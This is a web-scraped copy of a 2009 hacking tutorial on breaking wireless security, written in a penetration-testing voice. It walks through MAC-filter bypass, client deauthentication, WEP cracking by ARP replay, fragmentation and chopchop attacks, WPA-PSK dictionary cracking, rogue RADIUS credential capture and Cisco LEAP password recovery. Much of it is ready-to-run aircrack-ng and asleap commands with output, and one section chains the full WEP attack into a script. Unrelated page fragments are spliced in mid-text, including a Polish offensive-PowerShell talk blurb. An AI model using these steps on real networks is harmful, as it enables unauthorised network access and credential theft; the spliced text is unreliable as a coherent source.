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Vulnerability analysis, Security Papers, Exploit Tutorials                              

          Wi-Foo Ninjitsu Exploitation
                              |=----------------=[ Wi-Foo Ninjitsu Exploitation    ]=---------------=|
                              |=-----------------------=[ 24 February 2009 ]=-----------------------=|
                              |=---------------------=[ By CWH Underground ]=---------------------=|


          Title     :   Wi-Foo Ninjitsu Exploitation
          Author    :   JabAv0C && ZeQ3uL
          Team      :   CWH Underground []
          Website   : /
          Date      :   2009-02-24


            [0x00] - Introduction

            [0x01] - Security of Wireless network

            [0x02] - Breaking the Simple Defenses

                    [0x02a] - Mac Filtering
                    [0x02b] - Discover Hidden SSID
                    [0x02c] - Sniffing informations on the Air

            [0x03] - Get closer with cracking tool

                    [0x03a]   -   Aircrack-ng suite
                    [0x03b]   -   Decrypt packet with airdecap-ng
                    [0x03c]   -   Decloak packet with airdecloak-ng
                    [0x03d]   -   AirCracking 101

            [0x04] - Owned the WEP Key with Simple Technique (No Injection)

                    [0x04a] - Capturing method
                    [0x04b] - Cracking method

            [0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)

                    [0x05a]   -   Monitor Mode
                    [0x05b]   -   Fake Authentication
                    [0x05c]   -   Arp Replay Attack
                    [0x05d]   -   Fragmentation Attack
                    [0x05e]   -   Korek ChopChop Attack
                    [0x05f]   -   Packetforge
                    [0x05g]   -   ARP Request Replay with Interactive Attack
                    [0x05h]   -   Cracking WEP Key

            [0x06] - Conclusion steps for cracking WEP

            [0x07] - Owned the WPA-PSK/WPA2-PSK Key

            [0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)

            [0x09] - Exploiting CISCO LEAP

            [0x10] - Mass Exploit with Karmetasploit

            [0x11] - References

            [0x12] - Greetz To

           [0x00] - Introduction

                  This paper introduce practical techniques used by hackers to break the wireless security.
          We recommend that the reader should have basic knowledge of wireless operation.

                  This paper contains 13 sections but practical content is in 10 sections, from 0x02 to 0x10.
          In section 0x02, we talk about basic attacking to wireless network. Section 0x03 has content about
          tools used through this tutorial. In section 0x04, 0x05 and 0x06, we provide information to crack WEP.
          Section 0x07, 0x08 and 0x09 are the detail of cracking WPA and WPA2. Section 0x10 is detail about
          using metasploit in wireless network through rogue AP.

           [0x01] - Security of Wireless Network

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Vulnerability analysis, Security Papers, Exploit Tutorials                            


                  Wireless network has serious drawback when comparing with wired network because it use air as media. So, hackers are capab
          by using man in the middle method or others.

                  Therefore, security issue in wireless is highly concerned and until now, the security standard of wireless can divide like

                  -   WEP
                  -   WPA-PSK
                  -   WPA2-PSK
                  -   WPA-802.1x
                  -   WPA2-802.1x

                  WEP is the original security standard for wireless network but it is cracked easily. WPA and WPA2 are offerred to increase
          and solve the vulnerabilities in WEP. WPA and WPA2 still also devide to Pre-shared Key and 802.1x which are used for personal and
          respectively. In addition to these standards, there are other mechanisms to enhance wireless security such as, hidden ssid, MAC fi
          talk about hacking these security standards and mechanisms in this tutorial and also provide other attacking methods which hacker
          wireless network.

           [0x02] - Breaking the Simple Defenses

                   [0x02a] - Bypass Mac Filtering

                          This is a basic security method by storing legitimate client MAC address in the access point. When there is authen
                  to access point, the access point compares the requesting MAC address with MAC address stored in its memory. If the result
                  the authentication is success otherwise it is failed. However, this method is easy to bypass, the attacker is only change

                          We have a case study of bypassing MAC filtering attack. One day, we have a change to do the wireless penetration t
                  First, we use kismet to discover the access points around the company. This make us know the exact location of each access
                  by fixing channel for capturing packets. Fixing the target channel can improve efficiency of airodump-ng. We know from air
                  the access point use open authentication and it does not use any encryption. So, we try to connect to the access point but
                  our authentication request. We conclude that this network use MAC filtering. From airodump-ng, we see that there are clien
                  We immediately change our MAC address to be like the associated client and try to connect again. In this time, everything
                  Moreover, we are able to access internal network of this company and run any tools, such as nmap, nessus, exploit, against

                   [0x02b] - Discover Hidden SSID

                          Some environment, wireless administrator config to hidden ssid. So, the attacker cannot know the ssid of network
                  and also cannot connect to that network. In airodump, it shows <lenght ?> where ? is the number of ssid lenght.
                  The only way to know the ssid name is from association request. This packet occurs when there is a legitimate client conne
                  We are able to force a legitimate client to re-connect to access point by sending de-authentication packet to the client b
                  The command for doing that is like this:

                  #aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
                  21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
                  21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]

                          After sending du-authentication packet to the client, the client will do re-authentication and re-association.
                  Airodump-ng can detect this process and know SSID of this network.

                   [0x02c] - Sniffing informations on the Air

                          This topic does not use any advance technique or deep knowledge. Many wireless networks use open authentication wi
                  encryption mechanism. The attacker needs only sniffing packets from the air and find the credential information of protoco
                  telnet, ftp etc. These protocol does not have any encryption. So, we can find username and password by only looking the ca
                  We are able to sniff others data by using airodump-ng.

           [0x03] - Get closer with cracking tool

                  We Recommend to use Aircrack-NG, Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once
          have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new
          thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wirel

                   [0x03a] - Aircrack-ng suite

                            There are four tools in aircrack-ng suite which play an important role in this tutorial.

                  - airodump-ng: used for capturing packets
                          Use airodump-ng first every time in order to open monitor mode, which also enable injection capability of our card
                  - aireplay-ng: used for injection
                          o de-authentication: used to send deauthentication packet to associated client
                          o fake authentication: used to perform fake authentication process
                          o interactive packet replay: used to choose the preferred packet to perform replay attack
                          o arp replay: used to perform arp replay attack automatically

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Vulnerability analysis, Security Papers, Exploit Tutorials                             

                          o Korek chopchop: used to generate key stream by using chopchop technique
                          o fragment: used to generate key stream by using fragment technique
                  - packetforge-ng: used for create packet
                  - aircrack-ng: used for recovering key

                  More detail:

                   [0x03b] - Decrypt packet with airdecap-ng

                          After we got WEP or WPA key, sometime we want to decrypt captured packet. Aircrack team has already
                  provide us the tool for doing that. It is called "airdecap-ng". Examples of using airdecap is something like:

                  #airdecap-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap


                  #airdecap-ng -e Workshop workshop-02.cap

                  The output from these commands is file ending with "-dec.cap".

                  PS. for WPA, airdecap-ng will return successful result for only file which contains four ways handshake.

                   [0x03c] - Decloak packet with airdecloak-ng

                          Cloaking is a technique to disturb cracking WEP key process. This technique is done by injecting packets which are
                  to the network, these packets are called "chaff". If the attacker capture these packet and do the cracking, The result wil
                  returned. However, aircrack team developped the tool to deal with this technique, it is called "airdecloak-ng".

                  #airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap

                  This command return two files:
                  - workshop-01-filtered.cap: contain the filtered packets from specific bssid
                  - workshop-01-cloaked.cap: contain the cloaked packets from specific bssid

                   [0x03d] - AirCracking 101

                           PTW Attack (-z)
                                   (aircrack-ng -z capture.cap), Only work for WEP 64/128 bits, Require ARP request/replay packet that you mu

                           Dictionary Attack (WPA/WPA2 passphrases)
                                   (aircrack-ng -w pass.lst *.cap)

                           Fudge Attack (-f)
                                   Once hit 2 millions IVs, Try fudge factor to "-f 4". Retry, increasing the fudge factor by adding 4 to it

                  ** All the while, keep collecting data. Remember the golden rule, "The More IVs the Better"

           [0x04] - Owned the WEP Key with Simple Technique (No Injection)

                          WEP is just like a dead method to protect network from unauthorized access. There are several means to crack WEP k
                  The first of all, we should prepare the device which supports monitor mode and can inject packet to the network.

                           After that we prepare tools for cracking, I choose to use aircrack-ng in BT3 final on vmware.

                  Ok, let clear about concept of cracking WEP.
                  The main idea is to collect the encrypted packets as much and fast as we can and then use these packets to crack for the W
                  So, there are two situations from the above idea.

                           1. The network is high traffic.
                           2. The network is low traffic.

                  What's different between them?
                  Of course, the first case, we use only airodump to collect packet and crack the key but the second case,
                  we have to inject packets to capture more packets. We introduce you, first, the capturing and cracking method.
                  Then we talk about injecting method which is used only with low traffic network.

                   [0x04a] - Capturing method

                          First, introduce you the way to collect packets. For 64-bits WEP key, we use about 50,000 IV packets and
                  about 150,000 IV packets for 128-bits WEP key.

                  The command for collecting packets is

                  #airodump-ng –w workshop rausb0

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Vulnerability analysis, Security Papers, Exploit Tutorials                                            

                   [ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx

                   BSSID               PWR RXQ    Beacons     #Data, #/s          CH    MB   ENC   CIPHER AUTH ESSID

                   xx:xx:xx:xx:xx:xx    77   94     10905     11054          0    11    54. WEP    WEP    OPN   Workshop

                   BSSID               STATION               PWR      Rate       Lost    Packets    Probes

                   xx:xx:xx:xx:xx:xx yy:yy:yy:yy:yy:yy    85 54-54      0     7747

                  We will get file “workshop-01.cap†      used for cracking the key later.

                  We can determine the number of packet by the data field, around 90% of packets showing in data field are our required IV p

                   [0x04b] - Cracking method

                           After we collected enough encrypted packets (IV packets), we use aircrack-ng for recovering the key.

                  #aircrack-ng –b xx:xx:xx:xx:xx:xx workshop-01.cap

                  -b xx:xx:xx:xx:xx:xx is the MAC address of target access point

                  The successful cracking result is following:
                  Opening workshop-01.cap
                  Attack will be restarted every 5000 captured ivs.
                  Starting PTW attack with 50417 ivs.
                                   KEY FOUND! [ 00:11:22:33:44 ]
                  Decrypted correctly: 100%

           [0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)

                  This method is not necessary in high traffic network but it is very important in low traffic network. The idea behind this
          we have to inject a packet to force access point to generate new packet back to client. The new packet contains new IV.

                  If we carefully think about above idea, the source MAC address must be associated, the packet must send from client to acc
          and the packet must cause the access point to produce the response or another packet; normally we should the packet which has broa

                  We can conclude about the requirements of chosen packet for injection as following.
                  - The MAC address is associated to access point. (we can do this by fake authentication)
                  - Send from client to access point. (the “To DS†  flag is set to 1)
                  - The destination MAC address is broadcast. (FF:FF:FF:FF:FF:FF)

                  The well-known packet which covers all requirements is arp request broadcast. In the aircrack-ng suite, there is aireplay-
                  - The network has ARP request.
                  - The network has no ARP request.

                  No matter which case we are faced with, the important we have to realize is that we have to perform injection with associa
          Now, we have two choices. First is to change our MAC address to be the associated MAC address or the second is to do fake authenti

                   [0x05a] - Monitor Mode

                           Using airmon-ng for setting your wifi card to Monitor Mode and prepare for Injection packet.

                  #airmon-ng start wlan0 11

                           Setting wlan0 to Monitor mode on channel 11, We must specify the same channel as the target AP channel.

                   [0x05b] - Fake Authentication

                           We can do fake authentication by following command.

                           #aireplay-ng -1 0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0

                           –a xx:xx:xx:xx:xx:xx is MAC address of access point
                           –h yy:yy:yy:yy:yy:yy is MAC address of our wireless card

                           If we get successful result, our MAC address will associate with particular access point.

                  The successful result look like:
                  00:00:00 Sending Authentication Request
                  00:00:00 Authentication successful
                  00:00:00 Sending Association Request
                  00:00:00 Association successful :-)

                  After succeeding in fake authentication, we have to determine what type of network we are faced with and pick the appropri

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Vulnerability analysis, Security Papers, Exploit Tutorials                                            

                   [0x05c] - Arp Replay Attack

                           We can use arp replay attack by following command.

                           #aireplay-ng -3 -b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0

                           –b xx:xx:xx:xx:xx:xx is MAC address of access point
                           –h yy:yy:yy:yy:yy:yy is MAC address of our wireless card

                           Aireplay-ng will detect arp request and use it to perform replay attack automatically.

                  The response will look like following when it find out arp request.
                  21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
                  Saving ARP requests in replay_arp-0223-210620.cap
                  You should also start airodump-ng to capture replies.
                  Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps)

                          ** In some cases, there is no arp request broadcasted from access point. So, we cannot use normal arp replay attac
                  We have to generate key stream from captured packet and use the key stream to forge arp request packet and then replay to
                  in order to generate new IV packet. There are two ways for generate key stream called “chopchop attack†  and “fragme
                  Both methods can perform by aireplay-ng.

                   [0x05d] - Fragmentation Attack

                          Fragment attack is used to generate key stream in a size of 1500 bytes. So, we can use this key stream to create a
                  which has size up to 1500 bytes. The command for fragment attack is

                           #aireplay-ng -5 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0

                  The system responds with this:
                  21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
                  21:21:07 Waiting for a data packet...

                           Size: 90, FromDS: 1, ToDS: 0 (WEP)

                                 BSSID   =    00:1B:2F:3D:CB:D6
                             Dest. MAC   =    00:1A:73:37:E2:A3
                            Source MAC   =    00:1B:2F:3D:CB:D6

                           0x0000:   8842   2c00   001a   7337   e2a3   001b   2f3d   cbd6   .B,...s7..../=..
                           0x0010:   001b   2f3d   cbd6   20df   0000   b168   ff00   2872   ../=.. ....h..(r
                           0x0020:   7547   d03f   70d7   2d29   1397   7d3d   ac16   382a   uG.?p.-)..}=..8*
                           0x0030:   f20f   77fb   ca63   13e0   f7a6   9228   ddc0   8263   ..w..c.....(...c
                           0x0040:   5315   a328   87cb   0d4a   b36a   e5be   93c7   307a   S..(...J.j....0z
                           0x0050:   7bc2   18d7   2df5   94f2   5aed                        {...-...Z.

                  Use this packet ?

                  We have to answer "y"

                  Use this packet ? y

                  And the successful process looks like this:
                  Saving chosen packet in replay_src-0223-212107.cap
                  Data packet found!
                  Sending fragmented packet
                  Got RELAYED packet!!
                  Thats our ARP packet!
                  Trying to get 384 bytes of a keystream
                  Got RELAYED packet!!
                  Thats our ARP packet!
                  Trying to get 1500 bytes of a keystream
                  Got RELAYED packet!!
                  Thats our ARP packet!
                  Saving keystream in fragment-0223-212107.xor
                  Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

                   [0x05e] - Korek ChopChop Attack

                          There is a guy called KoreK who develop the tricky attacking method called chopchop. It requires only one encrypte
                  to get key stream and then use the key stream to generate arp request packet and finally perform arp replay attack.
                  We are able to use chopchop attack with this command.

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Vulnerability analysis, Security Papers, Exploit Tutorials                                                            

                           #aireplay-ng -4 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0

                           Aireplay-ng will pick a packet for decrypting. we can should any packet which has BSSID like our target.

                  The response from the command looks like this:
                  21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11

                           Size: 90, FromDS: 1, ToDS: 0 (WEP)

                                 BSSID      =    00:1B:2F:3D:CB:D6
                             Dest. MAC      =    00:1A:73:37:E2:A3
                            Source MAC      =    00:1B:2F:3D:CB:D6

                           0x0000:      8842   2c00   001a     7337     e2a3     001b    2f3d   cbd6    .B,...s7..../=..
                           0x0010:      001b   2f3d   cbd6     6084     0000     55bc    e600   2e4e    ../=..`...U....N
                           0x0020:      a334   a2b3   fc4c     fe8a     2cf4     f548    0f27   90d0    .4...L..,..H.'..
                           0x0030:      767d   2725   bedd     62ec     252e     8b4b    d2d3   a8a0    v}'%..b.%..K....
                           0x0040:      bb3f   4874   c821     c402     467d     f70f    2a56   43a7    .?Ht.!..F}..*VC.
                           0x0050:      b09b   f0f1   8b04     fc1c     0b72                            .........r

                  Use this packet ?

                  And we will answer by typing "y" like this

                  Use this packet ? y

                  And then the system do the decrypting

                  Saving chosen packet in replay_src-0223-211242.cap

                  Offset    87   ( 3%   done)   |   xor   =   4E   |   pt   =   3C   |    64   frames   written   in   1097ms
                  Offset    86   ( 5%   done)   |   xor   =   16   |   pt   =   1D   |   119   frames   written   in   2029ms
                  Offset    85   ( 7%   done)   |   xor   =   63   |   pt   =   7F   |   146   frames   written   in   2476ms
                  Offset    84   ( 8%   done)   |   xor   =   97   |   pt   =   6B   |   239   frames   written   in   4068ms
                  Offset    83   (10%   done)   |   xor   =   0E   |   pt   =   0A   |   228   frames   written   in   3865ms
                  Offset    82   (12%   done)   |   xor   =   86   |   pt   =   0D   |   273   frames   written   in   4646ms
                  Offset    81   (14%   done)   |   xor   =   C9   |   pt   =   38   |     2   frames   written   in     35ms
                  Offset    80   (16%   done)   |   xor   =   C4   |   pt   =   34   |   185   frames   written   in   3145ms
                  Offset    79   (17%   done)   |   xor   =   BB   |   pt   =   20   |   250   frames   written   in   4253ms
                  Offset    78   (19%   done)   |   xor   =   F7   |   pt   =   47   |    97   frames   written   in   1649ms
                  Offset    77   (21%   done)   |   xor   =   E9   |   pt   =   4E   |   247   frames   written   in   4196ms
                  Offset    76   (23%   done)   |   xor   =   12   |   pt   =   51   |   237   frames   written   in   4029ms
                  Offset    75   (25%   done)   |   xor   =   56   |   pt   =   00   |    52   frames   written   in    884ms
                  Offset    74   (26%   done)   |   xor   =   2A   |   pt   =   00   |   431   frames   written   in   7326ms
                  Offset    73   (28%   done)   |   xor   =   7E   |   pt   =   71   |   232   frames   written   in   3946ms
                  Offset    72   (30%   done)   |   xor   =   1C   |   pt   =   EB   |   123   frames   written   in   2093ms
                  Offset    71   (32%   done)   |   xor   =   B6   |   pt   =   CB   |     9   frames   written   in    141ms
                  Offset    70   (33%   done)   |   xor   =   BC   |   pt   =   FA   |   256   frames   written   in   4365ms
                  Offset    69   (35%   done)   |   xor   =   1A   |   pt   =   18   |   179   frames   written   in   3041ms
                  Offset    68   (37%   done)   |   xor   =   94   |   pt   =   50   |   118   frames   written   in   2002ms
                  Offset    67   (39%   done)   |   xor   =   50   |   pt   =   71   |    65   frames   written   in   1109ms
                  Offset    66   (41%   done)   |   xor   =   9D   |   pt   =   55   |   172   frames   written   in   2921ms
                  Offset    65   (42%   done)   |   xor   =   3C   |   pt   =   48   |   196   frames   written   in   3338ms
                  Offset    64   (44%   done)   |   xor   =   BE   |   pt   =   F6   |   281   frames   written   in   4763ms
                  Offset    63   (46%   done)   |   xor   =   81   |   pt   =   BE   |    61   frames   written   in   1051ms
                  Offset    62   (48%   done)   |   xor   =   AC   |   pt   =   17   |   456   frames   written   in   7748ms
                  Offset    61   (50%   done)   |   xor   =   D2   |   pt   =   72   |    73   frames   written   in   1231ms
                  Offset    60   (51%   done)   |   xor   =   9C   |   pt   =   34   |   428   frames   written   in   7288ms
                  Offset    59   (53%   done)   |   xor   =   64   |   pt   =   B7   |   120   frames   written   in   2036ms
                  Offset    58   (55%   done)   |   xor   =   87   |   pt   =   55   |   188   frames   written   in   3200ms
                  Offset    57   (57%   done)   |   xor   =   0C   |   pt   =   47   |   119   frames   written   in   2024ms
                  Offset    56   (58%   done)   |   xor   =   8C   |   pt   =   07   |   124   frames   written   in   2095ms
                  Offset    55   (60%   done)   |   xor   =   2C   |   pt   =   02   |   364   frames   written   in   6197ms
                  Offset    54   (62%   done)   |   xor   =   25   |   pt   =   00   |   136   frames   written   in   2315ms
                  Offset    53   (64%   done)   |   xor   =   44   |   pt   =   A8   |   142   frames   written   in   2410ms
                  Offset    52   (66%   done)   |   xor   =   A2   |   pt   =   C0   |   102   frames   written   in   1733ms
                  Offset    51   (67%   done)   |   xor   =   C9   |   pt   =   14   |    19   frames   written   in    329ms
                  Offset    50   (69%   done)   |   xor   =   D5   |   pt   =   6B   |   183   frames   written   in   3110ms
                  Offset    49   (71%   done)   |   xor   =   0B   |   pt   =   2E   |    62   frames   written   in   1048ms
                  Offset    48   (73%   done)   |   xor   =   E8   |   pt   =   CF   |    18   frames   written   in    306ms
                  Offset    47   (75%   done)   |   xor   =   FB   |   pt   =   86   |    29   frames   written   in    496ms
                  Offset    46   (76%   done)   |   xor   =   4B   |   pt   =   3D   |   100   frames   written   in   1702ms
                  Offset    45   (78%   done)   |   xor   =   D6   |   pt   =   06   |    77   frames   written   in   1312ms
                  Offset    44   (80%   done)   |   xor   =   FD   |   pt   =   6D   |   226   frames   written   in   3828ms
                  Offset    43   (82%   done)   |   xor   =   27   |   pt   =   00   |   117   frames   written   in   2001ms
                  Offset    42   (83%   done)   |   xor   =   4F   |   pt   =   40   |    38   frames   written   in    641ms
                  Offset    41   (85%   done)   |   xor   =   1C   |   pt   =   54   |   354   frames   written   in   6020ms
                  Offset    40   (87%   done)   |   xor   =   20   |   pt   =   D5   |   277   frames   written   in   4714ms
                  Offset    39   (89%   done)   |   xor   =   C4   |   pt   =   30   |   113   frames   written   in   1918ms
                  Offset    38   (91%   done)   |   xor   =   2C   |   pt   =   00   |   485   frames   written   in   8244ms
                  Offset    37   (92%   done)   |   xor   =   8A   |   pt   =   00   |   231   frames   written   in   3933ms

                  The AP appears to drop packets shorter than 37 bytes.

6 of 12                                                                                                                                               12/24/10 5:48 PM
Vulnerability analysis, Security Papers, Exploit Tutorials                                            

                  Enabling standard workaround: IP header re-creation.
                  This doesn't look like an IP packet, try another one.

                  Warning: ICV checksum verification FAILED! Trying workaround.

                  The AP appears to drop packets shorter than 40 bytes.
                  Enabling standard workaround: IP header re-creation.

                  Saving plaintext in replay_dec-0223-211410.cap
                  Saving keystream in replay_dec-0223-211410.xor

                  Completed in 21s (2.48 bytes/s)

                  The result from this process is xor file and cap file. xor file contains key stream and cap file contains decrypted packet

                   [0x05f] - Packetforge

                           Creat encrypted packet form PRGA (XOR) that obtained from chopchop or fragment.

                           #Packetforge-ng -0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy –k –l –y re

                  The result is:
                  Wrote packet to: arp

                  From this command, we get arp request packet in file named “arp†                  .

                   [0x05g] - ARP Request Replay with Interactive Attack

                           We use aireplay to inject arp request packet to access point by following command.

                           #aireplay-ng -2 –r arp rausb0

                  The response will look like:
                          Size: 68, FromDS: 0, ToDS: 1 (WEP)

                                 BSSID   =    00:1B:2F:3D:CB:D6
                             Dest. MAC   =    FF:FF:FF:FF:FF:FF
                            Source MAC   =    00:21:27:C0:07:71

                           0x0000:   0841   0201   001b   2f3d   cbd6   0021   27c0   0771   .A..../=...!'..q
                           0x0010:   ffff   ffff   ffff   8001   55bc   e600   2e4e   a334   ........U....N.4
                           0x0020:   a2b3   fc4a   bb8b   24c4   2618   4f26   fdf7   6c3b   ...J..$.&.O&..l;
                           0x0030:   ef7a   2a36   5dbb   252c   8c0c   8764   632d   537e   .z*6].%,...dc-S~
                           0x0040:   66bf   700e                                             f.p.

                  Use this packet ?

                  We have to answer "y"

                  Use this packet ? y

                  aireplay-ng starts injecting the packet.

                  Saving chosen packet in replay_src-0223-211755.cap
                  You should also start airodump-ng to capture replies.

                  Sent 1200 packets...(499 pps)

                   [0x05h] - Cracking WEP Key

                           After we collected enough encrypted packets (IV packets), we use aircrack-ng for recovering the key.

                           #aircrack-ng –z capture1.cap (PTW Attack)

                  The successful cracking result is following:
                  Opening capture1.cap
                  Attack will be restarted every 5000 captured ivs.
                  Starting PTW attack with 50417 ivs.
                                           KEY FOUND! [ 00:11:22:33:44 ]
                          Decrypted correctly: 100%

7 of 12                                                                                                                               12/24/10 5:48 PM
Vulnerability analysis, Security Papers, Exploit Tutorials                                              

           [0x06] - Conclusion Scripts for Cracking WEP

                   Note: $AP is Access Point MAC Address
                         $WIFI is WIFI Card MAC Address

                   - airmon-ng start wlan0 11 (Must specific channel of Monitor Mode)
                   - airodump-ng -c 11 -w capture1.cap wlan0
                   - aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
                   - aireplay-ng -4 -b $AP -h $WIFI wlan0
                           If Not Work!! Try #aireplay-ng -5 -b $AP -h $WIFI wlan0
                   - packetforge-ng -0 -a $AP -h $WIFI -k -l -y replay_dec-03.xor -w arp-request
                   - aireplay-ng -2 -r arp-request wlan0
                   - aircrack-ng -z capture1.cap

                   ** These Method can use for Crack WEP with Clientless

           [0x07] - Owned the WPA-PSK/WPA2-PSK Key

                  PSK stands for Pre-Shared Key. These are mechanism improved to solve WEP vulnerabilities.
          So, it is able to crack the key by using the same ways as cracking WEP. The only way to recover WPA-PSK or WPA2-PSK is to capture
          four ways handshake and crack by using dictionary attack.

                  The idea for cracking Pre-shared key is to gather four ways handshake packet. We are able to do this by de-authenticate as
          This way will force the client to perform re-authentication and we can get four ways handshake from this process. The command for

                   #aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
                   21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
                   21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]

                   We assume that we capture this process in workshop.cap file. So, we perform cracking by using aircrack.

                   #aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap

          The successful result is following.
          Opening test-02.cap
          Read 252 packets.

             #   BSSID                ESSID                                     Encryption

             1   xx:xx:xx:xx:xx:xx    Workshop                                      WPA (1 handshake)

          Choosing first network as target.

          Opening workshop-02.cap
          Reading packets, please wait...

                                                  Aircrack-ng 1.0 rc1 r1085

                              [00:00:00] 0 keys tested (0.00 k/s)

                                     KEY FOUND! [ TheFuckinWPAKey ]

                 Master Key     : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4
                                  E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63

                 Transcient Key : E3   91   AD   02   78   A5   51   DE   2A   AE   15   25   DB   9B   4A   F6
                                  61   A7   42   D8   32   9B   48   37   01   80   0B   A7   83   F9   67   B2
                                  9B   FE   47   EA   0A   B8   E0   2D   E0   81   6E   BB   48   1F   AA   86
                                  2A   7E   B0   F7   BE   C8   2B   8F   14   DF   AB   6F   58   28   8E   E1

                EAPOL HMAC     : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D

          From this result, it means WPA-PSK/WPA2-PSK key is "TheFuckinWPAKey".

           [0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)

                  Most companies turned to use public key encryption with wireless network and they think that
          it is perfectly safe. But the tricky hacker still attacks this system by spoofing certificate.

          This attacking method takes an advantage of client incaution. Many clients accept certification
          without considering whether it is genuine certificate or not. This make attacker impersonate himself
          to be radius server and loggin credential information from victims.

          We can use freeradius as fake radius server combining with wpe patch to enable loggin credential
          information on freeradius server

8 of 12                                                                                                                                 12/24/10 5:48 PM

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"Powershell kung-fu" - Paweł Maziarz
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Powershella lubią admini, programiści, a najbardziej hakerzy. Będąc natywną powłoką systemów Windows nie rzuca się w oczy, jednocześnie dając ogromne możliwości ofensywne. Podczas prelekcji Paweł zaprezentuje zarówno skuteczne one-linery jak i wielolinijkowe skrypty, które mogą siać spustoszenie w nieprzygotowanej organizacji. Pojawią się ciekawe kanały C2, malware napisany w całości w Powershellu, wyszukiwanie i eksploitacja słabo skonfigurowanych serwerów MSSQL etc.100% mięsa.

it securityinformation securityinformation technology
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security

This document discusses WPA exploitation in wireless networks. It begins by explaining basic wireless networking concepts like WiFi, MAC addresses, and SSIDs. It then describes how wireless networks are vulnerable due to weak encryption methods like WEP. The document outlines stronger encryption methods like WPA and WPA2, but notes they can still be cracked with tools if a weak password is used. It proceeds to explain how tools like Aircrack-ng, Reaver, and John the Ripper can be used to crack wireless network encryption keys through techniques like packet sniffing, dictionary attacks, and exploiting WPS pins. In the end, it emphasizes the importance of using long, complex passwords to keep wireless networks secure.

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Linux Server Hardening This document has the step by step of the way of hardening the server. We have used the metasploitable server, the vulnerable ubuntu server designed to be hacked, and have done the hardening. We have stopped all the unnecessary services and ports. We have assumed the server to be the web server only. Hence, only port 80 and 443 will be opened. Then the firewall rules have been set following by the apache web server hardening, encryption of the folder and files, disabling the unwanted users, forcing the password policies.

server hardeningweb server hardeningfirewall rules
Vulnerability analysis, Security Papers, Exploit Tutorials                                      

          additional information:

           [0x09] - Exploiting CISCO LEAP

                  Cisco proprietary Lightweight Extensible Authentication Protocol (LEAP) wireless authentication process helps eliminate se
          by supporting centralized, user-based authentication and the ability to generate dynamic WEP keys. Cisco LEAP is one of the extens
          types specified by 802.1X.

                  LEAP is easy to implement and contains compelling features such as:
                  - Mutual Authentication
                  - User-Based Authentication
                  - Dynamic WEP Keys

                  We found username that send to Radius is plaintext that captured from wireshark but password was encrypted, So It's also V

                  asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords

                  - Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture
                  - Deauthentication of clients on a leap WLAN (speeding up leap password recovery) AIRJACK DRIVER REQUIRED

                  Download Here:

                  First step, Use asleap to produce the necessary database (.dat) and index files (.idx)

                  #./genkeys    -r    dict   -f   dict.dat    -n   dict.idx

                  dict = Our wordlist/dictionary file, with one word per line
                  dict.dat = Our new output pass+hash file (generated as a result of running this command)
                  dict.idx = Our new output index filename (generated as a result of running this command)

                  #./genkeys -r dictionary -f dict.dat -n dict.idx

                  genkeys 1.4 - generates lookup file for asleap. <>
                  Generating hashes for passwords (this may take some time) ...Done.
                  3 hashes written in 0.2 seconds: 122.67 hashes/second
                  Starting sort (be patient) ...Done.
                  Completed sort in 0 compares.
                  Creating index file (almost finished) ...Done.

                  The final step in recovering our weak LEAP password is to run the asleap command with our newly created .dat and .idx file

                  #./asleap    -r    data/leap.dump    -f    dict.dat   -n    dict.idx

                  leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) c
                  dict.dat = Our output pass+hash file (generated with genkeys, see above)
                  dict.idx = Our new output index filename (generated with genkeys, see above)

                  #./asleap -r data/leap.dump -f dict.dat -n dict.idx

                  asleap 1.4 - actively recover LEAP/PPTP passwords. <>
                  Using the passive attack method.

                  Captured LEAP exchange information:
                          username:       qa_leap
                          challenge:      0786aea0215bc30a
                          response:       7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
                          hash bytes:     4a39
                          NT hash:        a1fc198bdbf5833a56fb40cdd1a64a39
                          password:       qaleap
                  Closing pcap ...

